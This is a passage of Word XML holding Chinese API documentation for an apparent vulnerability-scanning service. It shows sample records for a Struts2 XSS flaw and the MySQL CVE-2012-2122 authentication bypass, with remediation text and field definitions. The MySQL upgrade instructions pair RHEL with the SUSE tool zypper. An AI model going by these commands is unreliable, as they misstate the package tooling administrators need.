        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042008001658",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Struts2 S2-002 跨站脚本漏洞",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "由于 Struts 2 在处理&lt;s：url&gt;和&lt;s：a&gt;标签时，对于用于构造&lt;s：a&gt;标记输出的参数值，双引号会被转义，对于用于构造&lt;s：a&gt;和&lt;s：url&gt;标记的输出的参数值，&lt;script&gt;标记会被递归地转义，导致存在 XSS 注入漏洞。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remedDescription": "请到官网下载升级到Struts 2.0.12以上版本修复该漏洞，漏洞修复后需要服务重启，建议业务不繁忙时修复。\r\n下载更新：https://struts.apache.org/download",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "permitExecuteTypes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeSeverity": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeSeverityTip": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "updateTime": 1540971348,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "inputSchemas": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042012001685",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "title": "Mysql_Mariadb 认证绕过漏洞(CVE-2012-2122)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "用户连接到MariaDB/MySQL后，应用会计算和比较令牌值，由于错误的转换，即使memcmp()返回非零值，也可能出现错误的比较，造成MySQL/MariaDB误认为密码是正确的，因为协议使用的是随机字符串，该Bug发生的几率为1/256。MySQL的版本是否受影响取决于程序的编译方式，很多版本（包括官方提供的二进制文件）并不受此漏洞的影响。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remedDescription": "升级MySQL到最新版本修复该漏洞，攻击者可利用该漏洞绕过某些安全限制，也可能导致攻击者无需知道正确口令就能登录到MySQL服务器。漏洞修复后需要服务重启。建议业务不繁忙时修复。使用以下命令升级：\r\nRHEL : sudo zypper update -y mysql\r\nCentOS : sudo yum </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>update -y mysql\r\nUbuntu : sudo apt-get update &amp;&amp; sudo apt-get install mysql",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "permitExecuteTypes": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeSeverity": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeSeverityTip": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "updateTime": 1540971384,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "inputSchemas": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {......}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 104,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221453ED"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2124"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5517"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3BBF663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0E468FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559C8D19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71DDD418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661E841E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7717A83D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C1145D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6236F918" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71FEE83B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B200975" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E5A44C1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="619E2B16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE7DFCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5981C27E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620F41C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77DDBDCD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680C906E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="450DB097" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="393C6886" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D82A416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E579572" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C74B33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="489CA264" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C0EBF61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CD0B90B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D72E531" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510CDD9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remedDescription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759E36B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A5AED2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C308BE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A608B10" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BCF7A51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>permitExecuteTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71945661" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C2C916" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65A948F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>允许的检测方式，1：版本对比 2：POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F66E502" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54C3B728" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeSeverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73566B45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="555E2BED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C818AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测脚本执行风险，0：无风险，1：低风险，2：中风险，</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>3：高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="218B74D6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="396C60DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>executeSeverityTip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCC9751" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD5A529" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2E1294" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行风险提示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11BE8331" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E0DEAA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76EF788E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF0DDD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="427B5D7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="543F0F21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BBAF2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>inputSchemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F3BB939" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713D86D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6069C1DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>输入参数定义列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="123448A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回部分说明：</w:t>
      </w:r>
      <w:r>
        <w:t>rows中inputSchemas</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2A4A0C2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AD3ABBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25709501" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B11204D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B111B1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53EDC74C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C17EEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2F1182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77BF5FBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C91315" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D3DB905" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64039110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77E10693" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EC62799" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E9C52A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06CA1782" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EFC9B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="211A1D3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01E08A00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E1AD780" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="785C6B7B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F47DB8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B87A4C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC860B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B326BC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数中文名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F05B5DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C943982" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>caption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
